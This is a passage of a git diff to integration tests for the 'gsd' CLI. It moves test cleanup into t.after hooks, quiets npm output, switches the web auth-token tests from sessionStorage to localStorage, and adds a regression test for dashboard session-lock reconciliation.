+      stderrSoFar += chunk.toString();
+      check();
+    });
+    // Fallback: resolve after 4s even if no stderr
+    setTimeout(resolve, 4000);
+  });
+
+  // Send SIGINT
+  child.kill("SIGINT");
+
+  const result = await resultPromise;
+  assert.ok(!result.timedOut, "test harness should not time out");
+
+  const stderr = stripAnsi(result.stderr);
+
+  // In environments where the process completes before SIGINT arrives
+  // (e.g., existing auto-mode session causes immediate conflict exit),
+  // exit code may be 0 or 1 instead of 11. The test verifies the
+  // handler's behavior when it can be observed.
+  if (stderr.includes("Interrupted")) {
+    // SIGINT handler fired — verify exit code 11
+    assert.strictEqual(
+      result.code, 11,
+      `SIGINT handler fired but exit code was ${result.code}, expected 11 (EXIT_CANCELLED)`,
+    );
+  } else {
+    // Process exited before SIGINT arrived — acceptable in environments
+    // with running gsd sessions that cause auto-mode conflict.
+    // Verify it at least didn't crash.
+    const combined = stripAnsi(result.stdout + result.stderr);
+    assertNoCrashMarkers(combined);
+    assert.ok(
+      result.code === 0 || result.code === 1 || result.code === 11,
+      `expected clean exit (0, 1, or 11), got ${result.code}`,
+    );
+  }
+});
+
+// ===========================================================================
+// 3. stream-json emits NDJSON on stdout (each line is valid JSON)
+// ===========================================================================
+
+test("headless --output-format stream-json emits NDJSON on stdout", async (t) => {
+  const tmpDir = createTempWithGsd("gsd-e2e-stream-json-");
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
+
+  // --max-restarts 0 to prevent retry loops that extend runtime.
+  const result = await runGsd(
+    ["headless", "--output-format", "stream-json", "--timeout", "2000", "--max-restarts", "0", "auto"],
+    45_000,  // generous harness timeout
+    {},
+    tmpDir,
+  );
+
+  assert.ok(!result.timedOut, "test harness should not time out");
+  // Non-zero exit expected (no API key / timeout), but 0 is acceptable
+  // if auto-mode completes immediately (session conflict).
+  assert.ok(result.code !== null, "process should exit with a code");
+
+  const stdout = result.stdout.trim();
+
+  // stream-json may produce zero events if the process errors before any
+  // events fire — that's valid. But if there IS stdout, every line must
+  // be valid JSON (NDJSON format).
+  if (stdout.length > 0) {
+    const lines = stdout.split("\n").filter((l: string) => l.trim().length > 0);
+    assert.ok(lines.length > 0, "if stdout has content, it should have at least one line");
+
+    for (let i = 0; i < lines.length; i++) {
+      try {
+        JSON.parse(lines[i]);
+      } catch (e) {
+        assert.fail(
+          `stdout line ${i + 1} is not valid JSON: ${(e as Error).message}\nline: ${lines[i].slice(0, 300)}`,
+        );
+      }
+    }
+
+    // Multiple NDJSON lines (not a single batch object) is expected
+    // for stream-json mode when events fire
+  }
+
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assertNoCrashMarkers(combined);
+});
+
+// ===========================================================================
+// 4. --resume with nonexistent ID exits 1 with clean error
+// ===========================================================================
+
+test("headless --resume with nonexistent ID exits 1 with descriptive error", async (t) => {
+  const tmpDir = createTempWithGsd("gsd-e2e-resume-bad-");
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
+
+  const result = await runGsd(
+    ["headless", "--resume", "nonexistent-id-xyz", "--max-restarts", "0", "auto"],
+    30_000,
+    {},
+    tmpDir,
+  );
+
+  assert.ok(!result.timedOut, "test harness should not time out");
+  assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
+
+  const stderr = stripAnsi(result.stderr);
+
+  // The error should mention the bad ID or "No session matching"
+  assert.ok(
+    stderr.includes("nonexistent-id-xyz") || stderr.includes("No session matching"),
+    `stderr should mention the bad session ID or 'No session matching', got:\n${stderr.slice(0, 500)}`,
+  );
+
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assertNoCrashMarkers(combined);
+});
+
+// ===========================================================================
+// 5. --output-format with invalid value exits 1 with helpful message
+// ===========================================================================
+
+test("headless --output-format with invalid value exits 1", async (t) => {
+  const tmpDir = createTempWithGsd("gsd-e2e-bad-format-");
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
+
+  const result = await runGsd(
+    ["headless", "--output-format", "invalid-format", "auto"],
+    15_000,
+    {},
+    tmpDir,
+  );
+
+  assert.ok(!result.timedOut, "test harness should not time out");
+  assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
+
+  const stderr = stripAnsi(result.stderr);
+
+  // Should mention valid formats
+  assert.ok(
+    stderr.includes("text") && stderr.includes("json") && stderr.includes("stream-json"),
+    `stderr should list valid output formats, got:\n${stderr.slice(0, 500)}`,
+  );
+
+  // Should mention what was provided
+  assert.ok(
+    stderr.includes("invalid-format"),
+    `stderr should echo the invalid value, got:\n${stderr.slice(0, 500)}`,
+  );
+
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assertNoCrashMarkers(combined);
+});
diff --git a/src/tests/integration/e2e-smoke.test.ts b/src/tests/integration/e2e-smoke.test.ts
index 3f09b196d..21025f5ab 100644
--- a/src/tests/integration/e2e-smoke.test.ts
+++ b/src/tests/integration/e2e-smoke.test.ts
@@ -406,156 +406,144 @@ test("gsd -h is equivalent to --help", async () => {
 // 13. gsd headless without .gsd/ directory exits 1 with clean error
 // ---------------------------------------------------------------------------
 
-test("gsd headless without .gsd/ directory exits 1 with clean error", async () => {
+test("gsd headless without .gsd/ directory exits 1 with clean error", async (t) => {
   const tmpDir = mkdtempSync(join(tmpdir(), "gsd-e2e-no-gsd-"));
 
-  try {
-    const result = await runGsd(["headless"], 10_000, {}, tmpDir);
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
 
-    assert.ok(!result.timedOut, "process should not hang");
-    assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
+  const result = await runGsd(["headless"], 10_000, {}, tmpDir);
 
-    const combined = stripAnsi(result.stdout + result.stderr);
-    assert.ok(
-      combined.includes(".gsd/") || combined.includes("No .gsd"),
-      `expected .gsd/ missing error, got:\n${combined.slice(0, 500)}`,
-    );
+  assert.ok(!result.timedOut, "process should not hang");
+  assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
 
-    assertNoCrashMarkers(combined);
-  } finally {
-    rmSync(tmpDir, { recursive: true, force: true });
-  }
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assert.ok(
+    combined.includes(".gsd/") || combined.includes("No .gsd"),
+    `expected .gsd/ missing error, got:\n${combined.slice(0, 500)}`,
+  );
+
+  assertNoCrashMarkers(combined);
 });
 
 // ---------------------------------------------------------------------------
 // 14. gsd headless new-milestone without --context exits 1
 // ---------------------------------------------------------------------------
 
-test("gsd headless new-milestone without --context exits 1", async () => {
+test("gsd headless new-milestone without --context exits 1", async (t) => {
   const tmpDir = mkdtempSync(join(tmpdir(), "gsd-e2e-no-ctx-"));
 
-  try {
-    const result = await runGsd(["headless", "new-milestone"], 10_000, {}, tmpDir);
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
 
-    assert.ok(!result.timedOut, "process should not hang");
-    assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
+  const result = await runGsd(["headless", "new-milestone"], 10_000, {}, tmpDir);
 
-    const combined = stripAnsi(result.stdout + result.stderr);
-    assert.ok(
-      combined.includes("context") || combined.includes("--context"),
-      `expected context-required error, got:\n${combined.slice(0, 500)}`,
-    );
+  assert.ok(!result.timedOut, "process should not hang");
+  assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
 
-    assertNoCrashMarkers(combined);
-  } finally {
-    rmSync(tmpDir, { recursive: true, force: true });
-  }
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assert.ok(
+    combined.includes("context") || combined.includes("--context"),
+    `expected context-required error, got:\n${combined.slice(0, 500)}`,
+  );
+
+  assertNoCrashMarkers(combined);
 });
 
 // ---------------------------------------------------------------------------
 // 15. gsd headless --timeout with invalid value exits 1
 // ---------------------------------------------------------------------------
 
-test("gsd headless --timeout with invalid value exits 1", async () => {
+test("gsd headless --timeout with invalid value exits 1", async (t) => {
   const tmpDir = mkdtempSync(join(tmpdir(), "gsd-e2e-bad-timeout-"));
 
-  try {
-    const result = await runGsd(
-      ["headless", "--timeout", "not-a-number", "auto"],
-      10_000,
-      {},
-      tmpDir,
-    );
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
 
-    assert.ok(!result.timedOut, "process should not hang");
-    assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
+  const result = await runGsd(
+    ["headless", "--timeout", "not-a-number", "auto"],
+    10_000,
+    {},
+    tmpDir,
+  );
 
-    const combined = stripAnsi(result.stdout + result.stderr);
-    assert.ok(
-      combined.includes("timeout") || combined.includes("positive integer"),
-      `expected timeout validation error, got:\n${combined.slice(0, 500)}`,
-    );
+  assert.ok(!result.timedOut, "process should not hang");
+  assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
 
-    assertNoCrashMarkers(combined);
-  } finally {
-    rmSync(tmpDir, { recursive: true, force: true });
-  }
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assert.ok(
+    combined.includes("timeout") || combined.includes("positive integer"),
+    `expected timeout validation error, got:\n${combined.slice(0, 500)}`,
+  );
+
+  assertNoCrashMarkers(combined);
 });
 
 // ---------------------------------------------------------------------------
 // 16. gsd headless --timeout with negative value exits 1
 // ---------------------------------------------------------------------------
 
-test("gsd headless --timeout with negative value exits 1", async () => {
+test("gsd headless --timeout with negative value exits 1", async (t) => {
   const tmpDir = mkdtempSync(join(tmpdir(), "gsd-e2e-neg-timeout-"));
 
-  try {
-    const result = await runGsd(
-      ["headless", "--timeout", "-5000", "auto"],
-      10_000,
-      {},
-      tmpDir,
-    );
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
 
-    assert.ok(!result.timedOut, "process should not hang");
-    assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
+  const result = await runGsd(
+    ["headless", "--timeout", "-5000", "auto"],
+    10_000,
+    {},
+    tmpDir,
+  );
 
-    const combined = stripAnsi(result.stdout + result.stderr);
-    assert.ok(
-      combined.includes("timeout") || combined.includes("positive integer"),
-      `expected timeout validation error, got:\n${combined.slice(0, 500)}`,
-    );
+  assert.ok(!result.timedOut, "process should not hang");
+  assert.strictEqual(result.code, 1, `expected exit 1, got ${result.code}`);
 
-    assertNoCrashMarkers(combined);
-  } finally {
-    rmSync(tmpDir, { recursive: true, force: true });
-  }
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assert.ok(
+    combined.includes("timeout") || combined.includes("positive integer"),
+    `expected timeout validation error, got:\n${combined.slice(0, 500)}`,
+  );
+
+  assertNoCrashMarkers(combined);
 });
 
-test("gsd headless query returns JSON from the built CLI", async () => {
+test("gsd headless query returns JSON from the built CLI", async (t) => {
   const tmpDir = createTempGitRepo("gsd-e2e-query-");
 
-  try {
-    mkdirSync(join(tmpDir, ".gsd", "milestones"), { recursive: true });
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
 
-    // Cold packaged startup in a fresh temp repo is now regularly >10s because
-    // the built CLI loads bundled TS resources through jiti before answering.
-    // This command is still healthy; it just needs a realistic timeout budget.
-    const result = await runGsd(["headless", "query"], 30_000, {}, tmpDir);
+  mkdirSync(join(tmpDir, ".gsd", "milestones"), { recursive: true });
 
-    assert.ok(!result.timedOut, "process should not hang");
-    assert.strictEqual(result.code, 0, `expected exit 0, got ${result.code}`);
+  // Cold packaged startup in a fresh temp repo is now regularly >10s because
+  // the built CLI loads bundled TS resources through jiti before answering.
+  // This command is still healthy; it just needs a realistic timeout budget.
+  const result = await runGsd(["headless", "query"], 30_000, {}, tmpDir);
 
-    const combined = stripAnsi(result.stdout + result.stderr);
-    assertNoCrashMarkers(combined);
+  assert.ok(!result.timedOut, "process should not hang");
+  assert.strictEqual(result.code, 0, `expected exit 0, got ${result.code}`);
 
-    const snapshot = JSON.parse(result.stdout);
-    assert.equal(typeof snapshot.state?.phase, "string", "query output should include state.phase");
-  } finally {
-    rmSync(tmpDir, { recursive: true, force: true });
-  }
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assertNoCrashMarkers(combined);
+
+  const snapshot = JSON.parse(result.stdout);
+  assert.equal(typeof snapshot.state?.phase, "string", "query output should include state.phase");
 });
 
-test("gsd worktree list loads the built worktree CLI without module errors", async () => {
+test("gsd worktree list loads the built worktree CLI without module errors", async (t) => {
   const tmpDir = createTempGitRepo("gsd-e2e-worktree-");
 
-  try {
-    // Cold packaged startup in a fresh temp repo is now regularly >10s because
-    // the built CLI loads bundled TS resources through jiti before listing.
-    const result = await runGsd(["worktree", "list"], 30_000, {}, tmpDir);
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
 
-    assert.ok(!result.timedOut, "process should not hang");
-    assert.strictEqual(result.code, 0, `expected exit 0, got ${result.code}`);
+  // Cold packaged startup in a fresh temp repo is now regularly >10s because
+  // the built CLI loads bundled TS resources through jiti before listing.
+  const result = await runGsd(["worktree", "list"], 30_000, {}, tmpDir);
 
-    const combined = stripAnsi(result.stdout + result.stderr);
-    assertNoCrashMarkers(combined);
-    assert.ok(
-      combined.includes("No worktrees") || combined.includes("Worktrees"),
-      `expected worktree CLI output, got:\n${combined.slice(0, 500)}`,
-    );
-  } finally {
-    rmSync(tmpDir, { recursive: true, force: true });
-  }
+  assert.ok(!result.timedOut, "process should not hang");
+  assert.strictEqual(result.code, 0, `expected exit 0, got ${result.code}`);
+
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assertNoCrashMarkers(combined);
+  assert.ok(
+    combined.includes("No worktrees") || combined.includes("Worktrees"),
+    `expected worktree CLI output, got:\n${combined.slice(0, 500)}`,
+  );
 });
 
 // ===========================================================================
diff --git a/src/tests/integration/pack-install.test.ts b/src/tests/integration/pack-install.test.ts
index 4abd4cbfb..e69b03ee0 100644
--- a/src/tests/integration/pack-install.test.ts
+++ b/src/tests/integration/pack-install.test.ts
@@ -49,6 +49,27 @@ function createNpmSandbox(prefix: string): NpmSandbox {
   };
 }
 
+function buildQuietNpmEnv(sandbox: NpmSandbox): NodeJS.ProcessEnv {
+  return {
+    ...sandbox.env,
+    NPM_CONFIG_LOGLEVEL: "error",
+    npm_config_loglevel: "error",
+    NPM_CONFIG_FUND: "false",
+    npm_config_fund: "false",
+    NPM_CONFIG_AUDIT: "false",
+    npm_config_audit: "false",
+  };
+}
+
+function runNpmQuiet(args: string[], sandbox: NpmSandbox): void {
+  execFileSync("npm", args, {
+    cwd: projectRoot,
+    env: buildQuietNpmEnv(sandbox),
+    stdio: "ignore",
+    maxBuffer: 16 * 1024 * 1024,
+  });
+}
+
 function packTarball(sandbox: NpmSandbox): string {
   const pkg = JSON.parse(readFileSync(join(projectRoot, "package.json"), "utf-8"));
   const safeName = pkg.name.replace(/^@[^/]+\//, "").replace(/\//g, "-");
@@ -56,11 +77,7 @@ function packTarball(sandbox: NpmSandbox): string {
   const packDestination = join(sandbox.rootDir, "pack-output");
 
   mkdirSync(packDestination, { recursive: true });
-  execFileSync("npm", ["pack", "--pack-destination", packDestination], {
-    cwd: projectRoot,
-    env: sandbox.env,
-    stdio: ["ignore", "ignore", "pipe"],
-  });
+  runNpmQuiet(["pack", "--pack-destination", packDestination], sandbox);
   return join(packDestination, tarball);
 }
 
@@ -97,79 +114,76 @@ function listTarEntries(tarballPath: string): Promise<string[]> {
 // 1. npm pack produces valid tarball with correct file layout
 // ═══════════════════════════════════════════════════════════════════════════
 
-test("npm pack produces tarball with required files", async () => {
+test("npm pack produces tarball with required files", async (t) => {
   const sandbox = createNpmSandbox("gsd-pack-test-");
   const tarballPath = packTarball(sandbox);
 
   assert.ok(existsSync(tarballPath), "tarball created");
 
-  try {
-    const files = await listTarEntries(tarballPath);
-
-    // Critical files must be present
-    assert.ok(files.some(f => f.includes("dist/loader.js")), "tarball contains dist/loader.js");
-    assert.ok(files.some(f => f.includes("dist/cli.js")), "tarball contains dist/cli.js");
-    assert.ok(files.some(f => f.includes("dist/app-paths.js")), "tarball contains dist/app-paths.js");
-    assert.ok(files.some(f => f.includes("dist/wizard.js")), "tarball contains dist/wizard.js");
-    assert.ok(files.some(f => f.includes("dist/resource-loader.js")), "tarball contains dist/resource-loader.js");
-    assert.ok(files.some(f => f.includes("pkg/package.json")), "tarball contains pkg/package.json");
-    assert.ok(files.some(f => f.includes("src/resources/extensions/gsd/index.ts")), "tarball contains bundled gsd extension");
-    assert.ok(files.some(f => f.includes("scripts/postinstall.js")), "tarball contains postinstall script");
-
-    // pkg/package.json must have piConfig
-    const pkgJson = readFileSync(join(projectRoot, "pkg", "package.json"), "utf-8");
-    const pkg = JSON.parse(pkgJson);
-    assert.equal(pkg.piConfig?.name, "gsd", "pkg/package.json piConfig.name is gsd");
-    assert.equal(pkg.piConfig?.configDir, ".gsd", "pkg/package.json piConfig.configDir is .gsd");
-  } finally {
+  t.after(() => {
     rmSync(tarballPath, { force: true });
     rmSync(sandbox.rootDir, { recursive: true, force: true });
-  }
+  });
+
+  const files = await listTarEntries(tarballPath);
+
+  // Critical files must be present
+  assert.ok(files.some(f => f.includes("dist/loader.js")), "tarball contains dist/loader.js");
+  assert.ok(files.some(f => f.includes("dist/cli.js")), "tarball contains dist/cli.js");
+  assert.ok(files.some(f => f.includes("dist/app-paths.js")), "tarball contains dist/app-paths.js");
+  assert.ok(files.some(f => f.includes("dist/wizard.js")), "tarball contains dist/wizard.js");
+  assert.ok(files.some(f => f.includes("dist/resource-loader.js")), "tarball contains dist/resource-loader.js");
+  assert.ok(files.some(f => f.includes("pkg/package.json")), "tarball contains pkg/package.json");
+  assert.ok(files.some(f => f.includes("src/resources/extensions/gsd/index.ts")), "tarball contains bundled gsd extension");
+  assert.ok(files.some(f => f.includes("scripts/postinstall.js")), "tarball contains postinstall script");
+
+  // pkg/package.json must have piConfig
+  const pkgJson = readFileSync(join(projectRoot, "pkg", "package.json"), "utf-8");
+  const pkg = JSON.parse(pkgJson);
+  assert.equal(pkg.piConfig?.name, "gsd", "pkg/package.json piConfig.name is gsd");
+  assert.equal(pkg.piConfig?.configDir, ".gsd", "pkg/package.json piConfig.configDir is .gsd");
 });
 
 // ═══════════════════════════════════════════════════════════════════════════
 // 2. npm pack → install → gsd binary resolves
 // ═══════════════════════════════════════════════════════════════════════════
 
-test("tarball installs and gsd binary resolves", async () => {
+test("tarball installs and gsd binary resolves", async (t) => {
   const sandbox = createNpmSandbox("gsd-install-test-");
   const tarballPath = packTarball(sandbox);
 
-  try {
-    // Install from tarball into a temp prefix
-    execFileSync("npm", ["install", "--prefix", sandbox.installPrefix, tarballPath, "--no-save"], {
-      env: sandbox.env,
-      stdio: ["ignore", "ignore", "pipe"],
-    });
-
-    // Verify the gsd bin exists in the installed package
-    const binName = process.platform === "win32" ? "gsd.cmd" : "gsd";
-    const installedBin = join(sandbox.installPrefix, "node_modules", ".bin", binName);
-    assert.ok(existsSync(installedBin), `gsd binary exists in node_modules/.bin/ (${binName})`);
-
-    // Verify loader.js is executable (has shebang)
-    const installedLoader = join(sandbox.installPrefix, "node_modules", "gsd-pi", "dist", "loader.js");
-    const loaderContent = readFileSync(installedLoader, "utf-8");
-    if (process.platform !== "win32") {
-      assert.ok(loaderContent.startsWith("#!/usr/bin/env node"), "loader.js has node shebang");
-    }
-
-    // Verify bundled resources are present
-    const installedGsdExt = join(
-      sandbox.installPrefix,
-      "node_modules",
-      "gsd-pi",
-      "src",
-      "resources",
-      "extensions",
-      "gsd",
-      "index.ts",
-    );
-    assert.ok(existsSync(installedGsdExt), "bundled gsd extension present in installed package");
-  } finally {
+  t.after(() => {
     rmSync(tarballPath, { force: true });
     rmSync(sandbox.rootDir, { recursive: true, force: true });
+  });
+
+  // Install from tarball into a temp prefix
+  runNpmQuiet(["install", "--prefix", sandbox.installPrefix, tarballPath, "--no-save"], sandbox);
+
+  // Verify the gsd bin exists in the installed package
+  const binName = process.platform === "win32" ? "gsd.cmd" : "gsd";
+  const installedBin = join(sandbox.installPrefix, "node_modules", ".bin", binName);
+  assert.ok(existsSync(installedBin), `gsd binary exists in node_modules/.bin/ (${binName})`);
+
+  // Verify loader.js is executable (has shebang)
+  const installedLoader = join(sandbox.installPrefix, "node_modules", "gsd-pi", "dist", "loader.js");
+  const loaderContent = readFileSync(installedLoader, "utf-8");
+  if (process.platform !== "win32") {
+    assert.ok(loaderContent.startsWith("#!/usr/bin/env node"), "loader.js has node shebang");
   }
+
+  // Verify bundled resources are present
+  const installedGsdExt = join(
+    sandbox.installPrefix,
+    "node_modules",
+    "gsd-pi",
+    "src",
+    "resources",
+    "extensions",
+    "gsd",
+    "index.ts",
+  );
+  assert.ok(existsSync(installedGsdExt), "bundled gsd extension present in installed package");
 });
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -230,7 +244,7 @@ test("gsd launches and loads extensions without errors", async () => {
   );
 });
 
-test("gsd exits early with a clear message when synced resources are newer than the binary", async () => {
+test("gsd exits early with a clear message when synced resources are newer than the binary", async (t) => {
   const fakeHome = mkdtempSync(join(tmpdir(), "gsd-version-skew-"));
   const fakeAgentDir = join(fakeHome, ".gsd", "agent");
   mkdirSync(fakeAgentDir, { recursive: true });
@@ -239,38 +253,36 @@ test("gsd exits early with a clear message when synced resources are newer than
     JSON.stringify({ gsdVersion: "999.0.0" }),
   );
 
-  try {
-    const result = await new Promise<{ code: number | null; stderr: string }>((resolve) => {
-      let stderr = "";
-      const child = spawn("node", ["dist/loader.js"], {
-        cwd: projectRoot,
-        env: {
-          ...process.env,
-          HOME: fakeHome,
-          BRAVE_API_KEY: "test",
-          BRAVE_ANSWERS_KEY: "test",
-          CONTEXT7_API_KEY: "test",
-          JINA_API_KEY: "test",
-          TAVILY_API_KEY: "test",
-        },
-        stdio: ["pipe", "pipe", "pipe"],
-      });
+  t.after(() => { rmSync(fakeHome, { recursive: true, force: true }); });
 
-      child.stderr.on("data", (data: Buffer) => {
-        stderr += data.toString();
-      });
-
-      child.stdin.end();
-      child.on("close", (code) => {
-        resolve({ code, stderr });
-      });
+  const result = await new Promise<{ code: number | null; stderr: string }>((resolve) => {
+    let stderr = "";
+    const child = spawn("node", ["dist/loader.js"], {
+      cwd: projectRoot,
+      env: {
+        ...process.env,
+        HOME: fakeHome,
+        BRAVE_API_KEY: "test",
+        BRAVE_ANSWERS_KEY: "test",
+        CONTEXT7_API_KEY: "test",
+        JINA_API_KEY: "test",
+        TAVILY_API_KEY: "test",
+      },
+      stdio: ["pipe", "pipe", "pipe"],
     });
 
-    assert.equal(result.code, 1, "startup exits with code 1 on version skew");
-    assert.match(result.stderr, /Version mismatch detected/, "prints a friendly skew header");
-    assert.match(result.stderr, /npm install -g gsd-pi@latest|gsd update/, "prints upgrade guidance");
-    assert.doesNotMatch(result.stderr, /\[gsd\] Extension load error/, "fails before extension loading");
-  } finally {
-    rmSync(fakeHome, { recursive: true, force: true });
-  }
+    child.stderr.on("data", (data: Buffer) => {
+      stderr += data.toString();
+    });
+
+    child.stdin.end();
+    child.on("close", (code) => {
+      resolve({ code, stderr });
+    });
+  });
+
+  assert.equal(result.code, 1, "startup exits with code 1 on version skew");
+  assert.match(result.stderr, /Version mismatch detected/, "prints a friendly skew header");
+  assert.match(result.stderr, /npm install -g gsd-pi@latest|gsd update/, "prints upgrade guidance");
+  assert.doesNotMatch(result.stderr, /\[gsd\] Extension load error/, "fails before extension loading");
 });
diff --git a/src/tests/web-auth-token.test.ts b/src/tests/integration/web-auth-token.test.ts
similarity index 74%
rename from src/tests/web-auth-token.test.ts
rename to src/tests/integration/web-auth-token.test.ts
index 4fd5fff5a..9f3571c57 100644
--- a/src/tests/web-auth-token.test.ts
+++ b/src/tests/integration/web-auth-token.test.ts
@@ -16,33 +16,33 @@ const projectRoot = process.cwd()
 
 const authSource = readFileSync(join(projectRoot, 'web', 'lib', 'auth.ts'), 'utf-8')
 
-test('auth.ts persists token to sessionStorage on extraction', () => {
-  assert.match(authSource, /sessionStorage\.setItem/, 'should persist token to sessionStorage after extracting from hash')
+test('auth.ts persists token to localStorage on extraction', () => {
+  assert.match(authSource, /localStorage\.setItem/, 'should persist token to localStorage after extracting from hash')
 })
 
-test('auth.ts falls back to sessionStorage when hash is absent', () => {
-  assert.match(authSource, /sessionStorage\.getItem/, 'should read from sessionStorage when URL hash is empty')
+test('auth.ts falls back to localStorage when hash is absent', () => {
+  assert.match(authSource, /localStorage\.getItem/, 'should read from localStorage when URL hash is empty')
 })
 
-test('auth.ts defines a sessionStorage key constant', () => {
-  assert.match(authSource, /SESSION_STORAGE_KEY/, 'should use a named constant for the sessionStorage key')
+test('auth.ts defines an auth storage key constant', () => {
+  assert.match(authSource, /AUTH_STORAGE_KEY/, 'should use a named constant for the localStorage key')
 })
 
 test('auth.ts clears the URL fragment after token extraction', () => {
   assert.match(authSource, /replaceState/, 'should clear the hash from the address bar')
 })
 
-test('auth.ts wraps sessionStorage calls in try/catch for private browsing', () => {
-  // sessionStorage can throw in private browsing when quota is exceeded
-  const setItemIndex = authSource.indexOf('sessionStorage.setItem')
-  const getItemIndex = authSource.indexOf('sessionStorage.getItem')
+test('auth.ts wraps localStorage calls in try/catch for private browsing', () => {
+  // localStorage can throw in private browsing when quota is exceeded
+  const setItemIndex = authSource.indexOf('localStorage.setItem')
+  const getItemIndex = authSource.indexOf('localStorage.getItem')
   assert.ok(setItemIndex > -1)
   assert.ok(getItemIndex > -1)
-  // Both sessionStorage accesses should be inside try blocks
+  // Both localStorage accesses should be inside try blocks
   const beforeSetItem = authSource.slice(Math.max(0, setItemIndex - 200), setItemIndex)
   const beforeGetItem = authSource.slice(Math.max(0, getItemIndex - 200), getItemIndex)
-  assert.match(beforeSetItem, /try\s*\{/, 'sessionStorage.setItem should be inside a try block')
-  assert.match(beforeGetItem, /try\s*\{/, 'sessionStorage.getItem should be inside a try block')
+  assert.match(beforeSetItem, /try\s*\{/, 'localStorage.setItem should be inside a try block')
+  assert.match(beforeGetItem, /try\s*\{/, 'localStorage.getItem should be inside a try block')
 })
 
 // ─── sendBeacon auth token tests ────────────────────────────────────────────
diff --git a/src/tests/integration/web-auto-dashboard-lock-reconciliation.test.ts b/src/tests/integration/web-auto-dashboard-lock-reconciliation.test.ts
new file mode 100644
index 000000000..dafdcffe1
--- /dev/null
+++ b/src/tests/integration/web-auto-dashboard-lock-reconciliation.test.ts
@@ -0,0 +1,199 @@
+/**
+ * Regression test for #2705: Web UI shows "Start auto" even while auto mode is
+ * already running.
+ *
+ * Root cause: collectAuthoritativeAutoDashboardData spawns a subprocess that
+ * imports auto.ts fresh. The module-level AutoSession state (s.active) is
+ * always false in a new process, so the subprocess always reports
+ * { active: false } even when auto IS running in the parent process.
+ *
+ * Fix: after obtaining the subprocess result, reconcile active/paused state
+ * with on-disk session lock and paused-session metadata.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, mkdtempSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  collectAuthoritativeAutoDashboardData,
+} from "../../web/auto-dashboard-service.ts";
+
+// ─── Helpers ──────────────────────────────────────────────────────────
+
+const repoRoot = join(import.meta.dirname, "..", "..", "..");
+
+function makeTempFixture(): { projectCwd: string; cleanup: () => void } {
+  const root = mkdtempSync(join(tmpdir(), "gsd-auto-lock-test-"));
+  const projectCwd = join(root, "project");
+  mkdirSync(projectCwd, { recursive: true });
+  return {
+    projectCwd,
+    cleanup: () => {
+      try { rmSync(root, { recursive: true, force: true }); } catch { /* best-effort */ }
+    },
+  };
+}
+
+function writeAutoModule(dir: string, payload: Record<string, unknown>): string {
+  const modulePath = join(dir, "fake-auto-dashboard.mjs");
+  writeFileSync(
+    modulePath,
+    `export function getAutoDashboardData() { return ${JSON.stringify(payload)}; }\n`,
+  );
+  return modulePath;
+}
+
+function writeSessionLock(projectCwd: string, data: Record<string, unknown>): void {
+  const gsdDir = join(projectCwd, ".gsd");
+  mkdirSync(gsdDir, { recursive: true });
+  writeFileSync(join(gsdDir, "auto.lock"), JSON.stringify(data));
+}
+
+function writePausedSession(projectCwd: string, data: Record<string, unknown>): void {
+  const runtimeDir = join(projectCwd, ".gsd", "runtime");
+  mkdirSync(runtimeDir, { recursive: true });
+  writeFileSync(join(runtimeDir, "paused-session.json"), JSON.stringify(data));
+}
+
+const INACTIVE_PAYLOAD = {
+  active: false,
+  paused: false,
+  stepMode: false,
+  startTime: 0,
+  elapsed: 0,
+  currentUnit: null,
+  completedUnits: [],
+  basePath: "",
+  totalCost: 0,
+  totalTokens: 0,
+};
+
+// ─── Tests ──────────────────────────────────────────────────────────
+
+test("#2705 regression: subprocess reports active=false but session lock exists with live PID → reconcile to active=true", async (t) => {
+  const fixture = makeTempFixture();
+  t.after(() => fixture.cleanup());
+
+  const modulePath = writeAutoModule(fixture.projectCwd, INACTIVE_PAYLOAD);
+
+  // On disk: session lock exists with current PID (simulates auto running in parent process).
+  writeSessionLock(fixture.projectCwd, {
+    pid: process.pid,
+    startedAt: new Date().toISOString(),
+    unitType: "execute-task",
+    unitId: "M001/S01/T01",
+    unitStartedAt: new Date().toISOString(),
+  });
+
+  const result = await collectAuthoritativeAutoDashboardData(repoRoot, {
+    env: {
+      ...process.env,
+      GSD_WEB_TEST_AUTO_DASHBOARD_MODULE: modulePath,
+      GSD_WEB_PROJECT_CWD: fixture.projectCwd,
+    },
+  });
+
+  // After reconciliation, active MUST be true because the lock PID is alive.
+  assert.equal(result.active, true, "active must be reconciled to true when session lock PID is alive");
+  assert.equal(result.paused, false, "paused must remain false when no paused-session exists");
+});
+
+test("#2705: subprocess reports active=false and no session lock → remains inactive", async (t) => {
+  const fixture = makeTempFixture();
+  t.after(() => fixture.cleanup());
+
+  const modulePath = writeAutoModule(fixture.projectCwd, INACTIVE_PAYLOAD);
+
+  const result = await collectAuthoritativeAutoDashboardData(repoRoot, {
+    env: {
+      ...process.env,
